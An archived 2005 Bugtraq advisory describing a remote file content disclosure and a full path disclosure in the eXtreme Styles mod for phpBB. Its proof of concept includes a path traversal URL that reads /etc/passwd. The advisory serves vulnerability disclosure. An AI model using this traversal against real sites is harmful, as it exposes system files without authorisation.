| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20051203132902.30066.qmail@securityfocus.com> Date: 3 Dec 2005 13:29:02 -0000 From: tommie1@...lphia.net To: bugtraq@...urityfocus.com Subject: eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities ==================================================== http://www.phpbbstyles.com/ Description =========== These vulnerabilities could allow an attacker that has gained administrative access view file content on the system. 1. Remote File Content Disclosure ======================= In xs_edit.php, the "edit" request field is not properly sanitized. 2. Full Path Disclosure ======================= In xs_edit.php, the "viewbackup" request field is not properly sanitized. Proof of Concept ================ 1. http://forum/admin/xs_edit.php?edit=../../../../etc/passwd 2. http://forum/admin/xs_edit.php?edit=&viewbackup=1 -------------- http://wtf.bz/
Powered by blists - more mailing lists